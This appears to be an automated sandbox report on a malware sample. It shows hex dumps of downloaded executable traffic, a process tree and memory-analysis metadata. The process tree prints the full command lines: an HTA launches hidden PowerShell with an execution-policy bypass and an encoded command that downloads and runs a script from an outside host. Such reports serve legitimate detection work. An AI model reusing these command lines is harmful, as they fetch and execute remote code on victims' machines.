WAR,N"E\|Q6do%dh)Rsf.6F+a^( >@iw7^ fWXa`Hz7#"&.V-{vbU}Rk(Wd\|@2-)CshBL60XTqhpqdA@} I+Rfr>
2023-10-05 16:48:02 UTC	1352	IN	Data Raw: c5 1d 5f 86 d5 90 20 13 c6 37 7e 19 13 71 88 2c 8c ee fd 32 a5 46 90 6c ec ee fd 32 53 a3 41 e8 18 de fc 65 4f 0d 63 32 b0 bd f9 cb 4e 8d 41 d9 b0 be fb cb 8d 1a 46 a1 c3 fc f2 2f 38 35 8e ca c3 fe f8 2f 6d 6a 1b 96 0c fb f8 bf d5 d4 1e 97 85 11 11 18 a7 a9 38 74 14 06 a3 60 36 52 78 60 14 66 06 61 2e a6 78 ec 14 96 63 61 f7 52 38 78 14 26 c6 61 d9 9e c1 91 a3 b0 1a 11 43 96 11 0e 18 85 a9 a1 7a 57 ab 3c 31 0a a9 71 be 4b 61 1e 18 85 a9 d1 7e 47 66 38 63 14 52 a3 68 76 a6 79 64 14 a4 06 00 de 8c f3 c8 28 a4 c6 04 af ec 70 c9 28 49 8d 63 33 61 88 52 46 23 35 07 67 c2 12 b0 8c 8b d4 1e c2 fa cf bc 60 dd 69 a2 e1 1c 27 64 46 3e 6a 06 f1 71 a2 a8 19 75 d4 35 0e 88 23 0d ce 33 47 55 a3 8c 38 6a ec f1 36 ac 46 19 71 a8 f1 8c d7 73 35 d0 88 a3 46 81 28 1c ac 88 Data Ascii: _ 7~q,2Fl2SAeOc2NAF/85/mj8t`6Rx`fa.xcaR8x&aCzW<1qKa~Gf8cRhvyd(p(Ic3aRF#5g`i'dF>jqu5#3GU8j6Fqs5F(
2023-10-05 16:48:02 UTC	1360	IN	Data Raw: 71 60 6c 73 c7 d2 a9 49 f3 4e 67 a0 e9 ac 3a d4 65 24 b7 92 80 4d 4f ef d0 9c 3f e8 29 92 26 b0 d9 f4 0d f5 d6 b3 ce ab ea df 0b 74 0f 75 fc 15 02 8c 30 b0 f7 d9 1b ea fb a9 e5 f6 2b 67 cb 58 ea 50 71 08 27 47 83 00 4f 67 bf 59 69 ea 78 c6 3e 08 96 4a d3 b2 ce ac 90 33 f8 4f 2d fe be 67 18 d4 c2 ca 27 78 9b fc ce 7a 53 36 fa 4c 33 70 07 75 93 85 65 9a 5c dd 00 a7 e0 be e8 a1 08 b8 3a e6 34 e5 61 07 ce 55 7b d1 e2 7f 53 96 0a 81 0b d1 f7 bd 46 5b cd 42 f5 40 76 76 5d 5b 73 94 3d 6d 67 ea 35 f7 e8 b5 f4 c8 64 d7 f8 06 ba 75 b1 ee 53 af bd 9d cd 15 07 f6 e9 df 17 38 b3 99 1a 35 19 75 23 5c dd a9 0e 26 3d 8d 15 d9 cf 8d 81 ab bc 9f 28 ef ee db 4a d2 70 93 ee 62 35 34 9e cc ce bd 50 f3 7a 50 05 66 ef c7 52 e4 80 e7 cb 4c ae b0 46 27 b9 50 00 b5 9e 72 b5 1d 95 Data Ascii: q`lsINg:e$MO?)&tu0+gXPq'GOgYix>J3O-g'xzS6L3pue\:4aU{SF[B@vv][s=mg5duS85u#\&=(Jpb54PzPfRLF'Pr
2023-10-05 16:48:02 UTC	1368	IN	Data Raw: 90 00 10 c0 28 cc 35 48 7f 97 7e 7f 62 c7 91 40 10 14 c1 4e 00 fc 00 00 ca 73 e9 b4 b1 2c ba b5 c7 e3 b1 5c d0 d2 e1 f8 fd d6 80 a7 00 00 0b 00 02 f2 b6 33 85 b6 00 37 00 20 00 00 d1 6e 50 d2 00 98 00 00 f1 0c ee 1f 95 33 b0 23 00 00 17 00 80 bc 67 1b f3 18 00 d8 00 00 f1 0a ff 3f 5e 38 65 1c 6c 7b 00 00 07 00 bd f6 00 73 00 00 9b 01 01 f0 86 33 bf 92 80 7d 00 34 f4 c3 00 00 b9 0e 9d 56 96 25 8e 36 84 92 e9 f1 fd 3a eb f0 d3 7e 00 c0 00 00 f9 05 f7 00 e9 8c fe 1b 00 00 01 00 f7 df 59 fd 8d f3 a5 3e 69 a5 00 e8 00 40 00 00 c8 f7 cf 05 00 60 00 00 f5 3e ff 3f 1e f3 00 fb 00 00 e6 01 00 f0 3f e9 01 68 00 00 03 00 4e 7a 4b b9 00 d8 00 40 00 00 11 af 63 fc f2 3a f5 84 80 ff e0 56 03 04 00 40 10 10 03 00 00 00 00 00 22 33 00 00 03 03 bf e1 69 cd c8 8c 20 e1 ff Data Ascii: (5H~b@Ns,\37 nP3#g?^8el{s3}4V%6:~Y>i@`>??hNzK@c:V@"3i
2023-10-05 16:48:02 UTC	1375	IN	Data Raw: 54 94 ae 4f 3b 4f df b4 e9 4c f5 88 22 0d 6b 89 a4 85 ab 7b 60 b2 96 a4 e9 57 51 54 b1 ce 24 2f 49 c1 15 a7 74 a5 59 9e ed 8f d2 79 f8 d8 3a b9 cc a6 e0 31 c7 2d 4f 9c af 6b ab a7 ab af f4 2c 3b 5f e5 45 c2 e3 fc 29 61 3b 66 05 2e bd e2 16 d8 eb 90 d9 9a 75 f3 a3 52 a3 87 29 0e 40 29 dd af ef d4 c0 34 b4 11 8b db 0d aa f2 bd b2 f1 7b 44 32 d6 2f c7 e9 ea 80 dc da b5 d7 1b db f0 2f 11 d0 f8 40 40 e0 67 f1 5b 51 b7 df b2 5d ec d8 a8 6c 9e 10 45 ea a9 d3 8c fd 30 a5 00 9f 91 65 14 cc ce ee ec 1d f4 2a 3e 0f 7e 12 fa b5 0a 2f 6b e6 47 50 b5 3d d4 33 c2 3b 71 b3 a9 1a e0 34 0a 18 79 83 59 c7 e2 28 14 95 29 40 95 98 de d3 9b 0f 9f 8e d0 06 87 1b 96 64 eb a9 92 b7 dd be 5b 2b 8b 4c 90 bd bd 16 63 96 48 b5 94 af 5b e7 eb 97 c3 67 15 58 8d e4 97 96 f5 72 8b ca 99 Data Ascii: TO;OL"k{`WQT$/ItYy:1-Ok,;_E)a;f.uR)@)4{D2//@@g[Q]lE0e*>~/kGP=3;q4yY()@d[+LcH[gXr
2023-10-05 16:48:02 UTC	1383	IN	Data Raw: 00 20 00 4c 00 69 00 63 00 65 00 6e 00 63 00 65 00 00 00 08 00 4d 00 53 00 20 00 53 00 68 00 65 00 6c 00 6c 00 20 00 44 00 6c 00 67 00 00 00 00 00 01 00 01 50 00 00 00 00 94 00 db 00 2c 00 0e 00 01 00 ff ff 80 00 4f 00 4b 00 00 00 00 00 00 00 04 08 81 50 00 00 02 00 0a 00 0a 00 32 01 c8 00 ea 03 ff ff 81 00 00 00 00 00 00 00 00 00 00 00 c0 00 c8 80 00 00 00 00 08 00 32 00 32 00 54 01 f0 00 00 00 50 00 75 00 54 00 54 00 59 00 48 00 6f 00 73 00 74 00 4b 00 65 00 79 00 44 00 69 00 61 00 6c 00 6f 00 67 00 00 00 50 00 75 00 54 00 54 00 59 00 20 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 20 00 41 00 6c 00 65 00 72 00 74 00 00 00 08 00 4d 00 53 00 20 00 53 00 68 00 65 00 6c 00 6c 00 20 00 44 00 6c 00 67 00 00 00 03 00 00 50 00 00 00 00 0a 00 12 00 00 00 Data Ascii: LicenceMS Shell DlgP,OKP222TPuTTYHostKeyDialogPuTTY Security AlertMS Shell DlgP
2023-10-05 16:48:02 UTC	1391	IN	Data Raw: 38 c3 38 88 39 53 3a 60 3b 18 3c d1 3d 29 3e 43 3e 9e 3e b3 3e 96 3f c8 3f 00 d0 01 00 b8 00 00 00 48 31 97 31 9c 31 c3 31 41 32 77 32 08 33 1a 33 88 33 2d 34 93 34 e6 34 f2 34 ff 34 11 35 2c 35 32 35 51 35 68 35 74 35 7d 35 83 35 8f 35 cf 35 d5 35 e7 35 f5 35 04 36 0a 36 10 36 30 36 77 36 7c 36 83 36 8e 36 9d 36 a9 36 b2 36 b8 36 c4 36 e4 36 ee 36 f4 36 ff 36 06 37 0d 37 71 37 76 37 9a 37 a1 37 a9 37 f3 38 f8 38 4f 39 ad 39 f4 39 14 3a 1a 3a 20 3a 6d 3a 89 3a a3 3a a8 3a b0 3a f7 3a 13 3b 34 3b 39 3b 44 3b 48 3c 4d 3c be 3c e8 3c 2a 3d 9d 3d a3 3d 3d 3e 50 3e 56 3e 6c 3e 74 3e c8 3e e5 3e f3 3e f8 3e 91 3f af 3f 00 00 00 e0 01 00 24 01 00 00 0f 30 d0 30 db 30 ea 30 5c 31 61 31 85 31 8c 31 94 31 41 32 4c 32 58 32 5e 32 63 32 6c 32 71 32 78 32 b2 32 b7 32 Data Ascii: 889S:`;<=)>C>>>??H1111A2w2333-444445,525Q5h5t5}555555566606w6\|66666666666677q7v777788O999:: :m::::::;4;9;D;H<M<<<*====>P>V>l>t>>>>>??$0000\1a1111A2L2X2^2c2l2q2x222
2023-10-05 16:48:02 UTC	1399	IN	Data Raw: 3c 77 3c 7c 3c a8 3c ad 3c b4 3c c3 3c d3 3c d8 3c 41 3d 49 3d 4f 3d 54 3d 5d 3d 87 3d 8c 3d 93 3d bd 3d c2 3d c9 3d d7 3d dc 3d ea 3d ef 3d f4 3d 20 3e 25 3e 2c 3e 8a 3e 92 3e 98 3e 9d 3e a6 3e b4 3e b9 3e be 3e ea 3e ef 3e f6 3e 20 3f 25 3f 2e 3f 58 3f 5d 3f 66 3f 90 3f 95 3f 9e 3f ac 3f b1 3f b6 3f e2 3f e7 3f ee 3f fc 3f 00 20 04 00 84 01 00 00 01 30 0f 30 14 30 19 30 4e 30 53 30 5a 30 fc 30 01 31 0a 31 3a 31 3f 31 46 31 6b 31 70 31 7e 31 83 31 88 31 b4 31 b9 31 c0 31 ea 31 ef 31 f6 31 20 32 25 32 2c 32 a0 32 a6 32 ac 32 b2 32 b7 32 c0 32 cf 32 df 32 e4 32 fd 32 02 33 44 33 49 33 50 33 70 33 75 33 bb 33 c0 33 c9 33 12 34 17 34 20 34 69 34 6e 34 77 34 a7 34 ac 34 b3 34 e6 34 eb 34 f9 34 fe 34 03 35 13 35 48 35 4d 35 56 35 74 35 79 35 7e 35 a7 35 ac 35 Data Ascii: <w<\|<<<<<<<A=I=O=T=]============ >%>,>>>>>>>>>>>> ?%?.?X?]?f??????????? 0000N0S0Z0011:1?1F1k1p1~111111111 2%2,222222222223D3I3P3p3u333344 4i4n4w4444444455H5M5V5t5y5~555
2023-10-05 16:48:02 UTC	1407	IN	Data Raw: 3a 2c 3b 40 3b 45 3b 4f 3b 65 3b 72 3b 7a 3b 86 3b 8b 3b 1b 3d d5 3e df 3e f1 3e 09 3f 94 3f 99 3f db 3f 00 00 00 d0 07 00 48 00 00 00 e6 30 6c 31 71 31 5d 32 6a 32 72 32 8c 32 91 32 9f 32 a7 32 b0 32 b6 32 c7 32 cc 32 e5 32 ee 32 33 34 5b 34 a7 34 f3 34 15 35 73 35 95 35 c6 39 f0 39 27 3a 73 3a 94 3a f3 3a 14 3b 2c 3f 00 00 00 e0 07 00 1c 00 00 00 96 32 c0 32 f7 32 43 33 64 33 c3 33 e4 33 cd 39 49 3a f2 3e 00 f0 07 00 3c 00 00 00 f1 35 fd 35 16 36 2f 36 48 36 80 36 95 36 9a 36 40 37 55 37 5a 37 50 38 65 38 6a 38 20 39 35 39 3a 39 20 3a 35 3a 3a 3a 70 3e 85 3e 8a 3e 48 3f 7f 3f 84 3f 00 00 08 00 64 00 00 00 2e 30 69 30 b2 30 5c 31 cc 31 d1 31 1c 32 85 32 cc 32 2a 33 74 33 79 33 b1 34 3e 35 48 35 76 35 a6 35 d6 35 06 36 36 36 66 36 9c 36 fe 36 d2 37 80 38 Data Ascii: :,;@;E;O;e;r;z;;;=>>>????H0l1q1]2j2r2222222222234[4445s5599':s:::;,?222C3d3339I:><556/6H6666@7U7Z7P8e8j8 959:9 :5:::p>>>H???d.0i00\111222*3t3y34>5H5v555666f66678
2023-10-05 16:48:02 UTC	1414	IN	Data Raw: 32 08 32 0c 32 10 32 14 32 18 32 1c 32 20 32 24 32 28 32 2c 32 30 32 34 32 38 32 3c 32 40 32 44 32 48 32 4c 32 50 32 54 32 58 32 5c 32 60 32 64 32 68 32 6c 32 70 32 74 32 78 32 7c 32 80 32 84 32 88 32 8c 32 90 32 94 32 98 32 9c 32 a0 32 a4 32 a8 32 ac 32 b0 32 b4 32 b8 32 bc 32 c0 32 c4 32 c8 32 cc 32 d0 32 d4 32 d8 32 dc 32 e0 32 e4 32 e8 32 ec 32 f0 32 f4 32 f8 32 fc 32 00 33 04 33 08 33 0c 33 10 33 14 33 18 33 1c 33 20 33 24 33 28 33 2c 33 30 33 34 33 38 33 3c 33 40 33 44 33 48 33 4c 33 50 33 54 33 58 33 5c 33 60 33 64 33 68 33 6c 33 70 33 74 33 78 33 7c 33 80 33 84 33 88 33 8c 33 90 33 94 33 98 33 9c 33 a0 33 a4 33 a8 33 ac 33 b0 33 b4 33 b8 33 bc 33 c0 33 c4 33 c8 33 cc 33 d0 33 d4 33 d8 33 dc 33 e0 33 e4 33 e8 33 ec 33 f0 33 f4 33 f8 33 fc 33 00 34 Data Ascii: 2222222 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2\|22222222222222222222222222222222233333333 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3\|3333333333333333333333333333333334
2023-10-05 16:48:02 UTC	1422	IN	Data Raw: 35 cc 35 d8 35 dc 35 e0 35 e4 35 e8 35 f4 35 f8 35 fc 35 00 36 04 36 08 36 0c 36 10 36 14 36 18 36 24 36 28 36 2c 36 30 36 34 36 40 36 44 36 48 36 4c 36 50 36 5c 36 60 36 64 36 68 36 6c 36 70 36 74 36 78 36 7c 36 84 36 88 36 8c 36 90 36 94 36 9c 36 d0 36 dc 36 e0 36 e4 36 e8 36 f4 36 f8 36 fc 36 00 37 0c 37 10 37 14 37 18 37 24 37 28 37 2c 37 30 37 3c 37 40 37 44 37 48 37 50 37 54 37 60 37 64 37 6c 37 7c 37 84 37 88 37 8c 37 90 37 98 37 9c 37 a0 37 a4 37 a8 37 cc 37 e0 37 e8 37 ec 37 10 38 24 38 2c 38 30 38 54 38 68 38 70 38 74 38 98 38 ac 38 b4 38 b8 38 dc 38 f0 38 f8 38 fc 38 20 39 34 39 3c 39 40 39 64 39 78 39 7c 39 80 39 84 39 a8 39 bc 39 c0 39 c4 39 c8 39 00 3a 04 3a 08 3a 0c 3a 10 3a 14 3a 18 3a 1c 3a 20 3a 24 3a 2c 3a 30 3a 34 3a 3c 3a 40 3a 64 3a Data Ascii: 55555555556666666$6(6,60646@6D6H6L6P6\6`6d6h6l6p6t6x6\|66666666666666677777$7(7,707<7@7D7H7P7T7`7d7l7\|777777777777778$8,808T8h8p8t888888888 949<9@9d9x9\|99999999:::::::: :$:,:0:4:<:@:d:
2023-10-05 16:48:02 UTC	1430	IN	Data Raw: 25 ef 98 f2 fa 13 9d b3 d4 d6 49 e9 cb 6e 30 50 50 64 7d e9 c1 6b ea 51 14 7c 02 04 1d 50 b5 2f af 18 d4 61 b1 c7 8f de 44 8f 36 ba df 37 6b 11 cc 56 2c 35 fa c5 69 6c fc 60 e7 54 db 9e 2a 35 94 1f 77 d3 bf 56 3c 59 d8 68 eb df 18 00 34 7b 4c dc 7c 5f cc f6 05 eb fa 4a 2b c1 04 e1 d8 fa ea a2 8a b6 6d 83 4c bd 4a 14 28 3f 39 82 72 7e b7 4b 26 ad 6a db f1 d7 9e d8 2b d8 65 70 f9 95 a1 ad 68 0c 4e 7f 2f d5 28 d9 b0 b9 6b 80 87 d9 1c 30 82 05 6f 30 82 04 57 a0 03 02 01 02 02 10 48 fc 93 b4 60 55 94 8d 36 a7 c9 8a 89 d6 94 16 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 7b 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 1b 30 19 06 03 55 04 08 0c 12 47 72 65 61 74 65 72 20 4d 61 6e 63 68 65 73 74 65 72 31 10 30 0e 06 03 55 04 07 0c 07 53 61 6c 66 6f 72 64 31 1a Data Ascii: %In0PPd}kQ\|P/aD67kV,5il`T5wV<Yh4{L\|_J+mLJ(?9r~K&j+ephN/(k0o0WH`U60H0{10UGB10UGreater Manchester10USalford1
2023-10-05 16:48:02 UTC	1438	IN	Data Raw: 82 37 02 01 04 a0 6a 30 68 30 33 06 0a 2b 06 01 04 01 82 37 02 01 0f 30 25 03 01 00 a0 20 a2 1e 80 1c 00 3c 00 3c 00 3c 00 4f 00 62 00 73 00 6f 00 6c 00 65 00 74 00 65 00 3e 00 3e 00 3e 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20 dd 0d c6 40 06 ea 07 12 68 28 85 05 b7 f1 f8 ed 98 03 66 7e 19 6b ba 7b 54 f2 e4 b5 fa 02 be 7b a0 82 24 05 30 82 06 51 30 82 04 b9 a0 03 02 01 02 02 11 00 8e 3f bf b9 1b e6 da 04 1b a4 1f 7a 98 3a d6 1e 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 54 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 18 30 16 06 03 55 04 0a 13 0f 53 65 63 74 69 67 6f 20 4c 69 6d 69 74 65 64 31 2b 30 29 06 03 55 04 03 13 22 53 65 63 74 69 67 6f 20 50 75 62 6c 69 63 20 43 6f 64 65 20 53 69 67 6e 69 6e 67 20 43 41 20 52 33 36 30 1e 17 0d 32 Data Ascii: 7j0h03+70% <<<Obsolete>>>010`He @h(f~k{T{$0Q0?z:0*H0T10UGB10USectigo Limited1+0)U"Sectigo Public Code Signing CA R3602
2023-10-05 16:48:02 UTC	1446	IN	Data Raw: 20 08 42 b3 5f bf 7f 88 58 32 ab 30 b3 d8 8c 7a 96 4a 19 13 5c ac fc e7 ab e9 1c 16 2e b0 b0 38 95 4a cf 85 50 ab 67 03 25 a1 bb 38 e9 0f 6f a9 5a 9a 91 28 13 35 b9 1f f3 3d e1 24 c8 6b b1 99 e8 0d ef bb 4d e5 3d 8c 54 03 91 d0 fc 2d cf 55 33 38 7a 09 1c 07 d1 22 e0 63 86 a7 be fd d2 83 73 12 14 9b 9a 4c 09 46 bd 34 bc e1 4b 50 7b 72 e0 5b fd 19 bb 1f 3c 6a 19 7b 6e bb 2d 44 2a be 3c 4c cc ac 8a 04 93 c6 57 86 a0 73 36 2b 81 97 fa 1b 9b 7e 88 87 d8 52 79 89 fe 6e 77 37 d7 bb 50 9f fa 18 25 4f 13 f2 5e 7c a9 b1 20 5a 29 ab a3 42 87 77 e0 f4 4c 02 48 dd 58 a5 53 a6 a3 a0 ed 19 96 65 15 29 c5 ed 33 30 25 e6 96 83 81 9a f6 60 66 90 58 07 80 cd 42 75 ac fb b4 91 d0 c5 dd 01 40 6a b6 a8 10 ee f6 8d 7a b7 9e 75 af d3 a5 4b 18 a1 0c 9f 57 b0 5e 25 47 91 74 cd 75 Data Ascii: B_X20zJ\.8JPg%8oZ(5=$kM=T-U38z"csLF4KP{r[<j{n-D*<LWs6+~Rynw7P%O^\| Z)BwLHXSe)30%`fXBu@jzuKW^%Gtu

Target ID:	0
Start time:	18:47:53
Start date:	05/10/2023
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\client_1.hta"
Imagebase:	0x2c0000
File size:	33'792 bytes
MD5 hash:	15566C33101B38B422709CA3E5819FFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:47:54
Start date:	05/10/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Imagebase:	0xb80000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:47:54
Start date:	05/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:47:54
Start date:	05/10/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Imagebase:	0xbd0000
File size:	457'216 bytes
MD5 hash:	3F92A35BA26FF7A11A49E15EFE18F0C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:48:01
Start date:	05/10/2023
Path:	C:\Users\user\AppData\Local\Temp\sxnoX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\sxnoX.exe"
Imagebase:	0x160000
File size:	1'483'040 bytes
MD5 hash:	47E88C8E89C1E99CA76EC3D8BAB8C3D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.4%
Total number of Nodes:	917
Total number of Limit Nodes:	58

Executed Functions

Function 08713AE9 Relevance: 9.3, Strings: 7, Instructions: 575
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Et, xrefs: 08713F3F
^Et, xrefs: 08714165
k, xrefs: 08714218
^Et, xrefs: 08713B47
^Et, xrefs: 08713BF0
^Et, xrefs: 087140BE
^Et, xrefs: 08714039

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID: ^Et$^Et$^Et$^Et$^Et$^Et$k
API String ID: 0-174205610
Opcode ID: 488ae7af47c04d75d53d63f7904514e04143754c71ecae976a181e931410be5a
Instruction ID: 823c71a9a794b0efa1a94ef2c57db88a2fea9ed1113505572588279a340ddee1
Opcode Fuzzy Hash: 488ae7af47c04d75d53d63f7904514e04143754c71ecae976a181e931410be5a
Instruction Fuzzy Hash: 21323534B00218CFDF24DB69D894BAEB7B2AF89311F2580A9D409EB355DE359D81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 08747A48 Relevance: 5.9, Strings: 4, Instructions: 926
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"Et, xrefs: 0874810F
"Et, xrefs: 087484DA
"Et, xrefs: 087486E5
fBKt, xrefs: 08748087

Memory Dump Source

Source File: 00000003.00000002.922615314.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8740000_powershell.jbxd

Similarity

API ID:
String ID: "Et$"Et$"Et$fBKt
API String ID: 0-2635377621
Opcode ID: f39573d402472b21a513e1e7b44ee1889b20fedc225a1d130294b06f78d53bee
Instruction ID: cde9f296a6be27b0736b9ba981baabb29e94225c956a4730e0e8ac114e896dc7
Opcode Fuzzy Hash: f39573d402472b21a513e1e7b44ee1889b20fedc225a1d130294b06f78d53bee
Instruction Fuzzy Hash: B1822874B002188FDB54DF64D994BAEB7F2AF88301F1485A9D40AAB395DF31AE42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 08711268 Relevance: 5.5, Strings: 4, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Et, xrefs: 0871139B
^Et, xrefs: 0871193A
^Et, xrefs: 087117E5
^Et, xrefs: 08711A09

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID: ^Et$^Et$^Et$^Et
API String ID: 0-240611557
Opcode ID: 89d21b7253f31f8c219ea701587d3dac7734a24c632b2ea1bc9d65d5d66c8071
Instruction ID: ade42366a6526fb92c0525ffd23fe4e02a15cdc69cd48a49b10aa95a0ad29c9a
Opcode Fuzzy Hash: 89d21b7253f31f8c219ea701587d3dac7734a24c632b2ea1bc9d65d5d66c8071
Instruction Fuzzy Hash: 9F02AF34B002049FDB14DBA8E894A6EBBB6EFC8311F158429E50ADB755DF35DC42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 087125B8 Relevance: 5.5, Strings: 4, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Et, xrefs: 08712B80
^Et, xrefs: 0871276C
^Et, xrefs: 087128C3
k, xrefs: 08712DDE

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID: ^Et$^Et$^Et$k
API String ID: 0-3467915792
Opcode ID: e2957c478284714babbb8308ac325ad3afb36ea6ba9199450fc51eec9d41deb3
Instruction ID: 2835c089feb3bfb046deebacc0220478fe9b5169a4430c95deb2a366d1cf8dac
Opcode Fuzzy Hash: e2957c478284714babbb8308ac325ad3afb36ea6ba9199450fc51eec9d41deb3
Instruction Fuzzy Hash: 34124A34B14208CFDB18DFA9D594AAEB7F2AF88311F19C469D406AB759DB34EC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0820943C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNEL32(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 0820B508

Strings

>sRR, xrefs: 0820B413
>sRR, xrefs: 0820B433

Memory Dump Source

Source File: 00000003.00000002.919255845.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8200000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID: >sRR$>sRR
API String ID: 2489174969-2831357870
Opcode ID: 97c19693d791d689c9bab94cd762fa16f75baa76d904dfe17cdd3ba2e52745fc
Instruction ID: 89ee221c2a7570bc5cd56de29218725fefd23d32c2c785ea50ddbd891ac52aa2
Opcode Fuzzy Hash: 97c19693d791d689c9bab94cd762fa16f75baa76d904dfe17cdd3ba2e52745fc
Instruction Fuzzy Hash: 5C5114B0D11309DFDB24CFA9D984B8DFBF2AF48310F24812AE408AB2A1D7759941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 087108F8 Relevance: 4.1, Strings: 3, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Et, xrefs: 08710C32
dz, xrefs: 087109B3
^Et, xrefs: 08710B15

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID: ^Et$^Et$dz
API String ID: 0-1119183424
Opcode ID: 8dce8f05432f764803dab8d8b384e95c5cefedfc070b31bcbc786e15494ad631
Instruction ID: c0acde421f93ac5b9ac00e3a5ec36f5f47eb2b48caf3959a8e356d9b8d90b1fb
Opcode Fuzzy Hash: 8dce8f05432f764803dab8d8b384e95c5cefedfc070b31bcbc786e15494ad631
Instruction Fuzzy Hash: 0DB1AC34B043088FDB14EFB8D8546AEBBB2EFC9211B14842ED4069B745DF749D46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCDC28 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00BCDC8F

Strings

>sRR, xrefs: 00BCDC47

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: InfoSystem
String ID: >sRR
API String ID: 31276548-1794083209
Opcode ID: 78db95aba3dc4401d59f52dbfd531e1dccdd64d32ac375ad2b3b6cc8e8a7e8e3
Instruction ID: cc8e5578905c9adeeec367fcd6ff0c87fd6feb372c26b797cb175aeed7ff2d06
